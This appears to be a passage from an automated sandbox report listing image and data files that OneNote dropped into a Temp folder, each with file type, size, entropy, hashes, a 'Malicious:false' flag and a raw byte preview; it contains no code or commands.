                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{3D97EB3A-703D-42B8-8B48-116EF98333D2}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52945
                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                  C:\Users\user\AppData\Local\Temp\{3E8E6D67-C603-4403-AFBC-34D64D937778}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Temp\{3FEC2471-40FC-452D-9396-C62C231DBE86}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):36740
                                                                                                  Entropy (8bit):7.48266872907324
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                  MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                  SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                  SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                  SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

                                                                                                  C:\Users\user\AppData\Local\Temp\{40DF0B06-9592-420D-A1E0-32B3DCB340CA}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):99293
                                                                                                  Entropy (8bit):7.9690121496708555
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                  MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                  SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                  SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                  SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

                                                                                                  C:\Users\user\AppData\Local\Temp\{4151E0C8-07F6-4DA1-96DF-969A1D48A5C1}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Temp\{41769BAE-1919-4623-ADE8-49D3F3A3038C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59707
                                                                                                  Entropy (8bit):7.858445368171059
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                  MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                  SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                  SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                  SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

                                                                                                  C:\Users\user\AppData\Local\Temp\{421D02A2-9135-4738-B7BC-0D03A65550BB}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19920
                                                                                                  Entropy (8bit):7.987696084459766
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                  MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                  SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                  SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                  SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

                                                                                                  C:\Users\user\AppData\Local\Temp\{44970FF8-6EA9-46E0-AF5D-DF2308982E82}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Temp\{456BCF67-8FF5-4E14-AC06-5582DF3A6763}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Temp\{47FD458F-5BA7-4D3E-904C-1AF2D0FC6E54}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Temp\{489A9F35-8E7C-4FA5-88F5-F682E898C0EA}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4744
                                                                                                  Entropy (8bit):0.6514096652148244
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Raou70ltYyfB3h1RRXUnffuYPhsjoOHKTigP/giRujlw//0lweI/M//guRujd:RaouCYyf9/Uf2Y6joOLWf/v
                                                                                                  MD5:D090CF58D487E8CCAEB7E4562A37F152
                                                                                                  SHA1:5F2EEDC322101659B0468CE1433928E8BA7AF2C4
                                                                                                  SHA-256:1B095E3009B8286BEA947F4712C32F7C9F0D056F67501C00A7FD6E28BFEF2002
                                                                                                  SHA-512:A790A9D42AA97A99EDBC606B3D02CC0ADD8AB238977C6F78A46A58041F6EED21A379E0466218E3E2EF7B21087EEF51ACADE9CB0B9CB7D2EF6E04D27C8B6FF1FA
                                                                                                  Malicious:false
                                                                                                  Preview:./.C..vL....W"v_.A.:.'rD.qBB.. H................?.....I...............................................................................................................h............................................7y..`$K....D.o.........Q.J...hL...n................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\{4940AE90-45B4-4351-96C6-AFB0A721F5A3}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Temp\{4986B563-3BCE-475E-8D50-3503FE3BF26E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{4AB3AA66-BECD-45E6-9F68-3677D6B77C3C}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
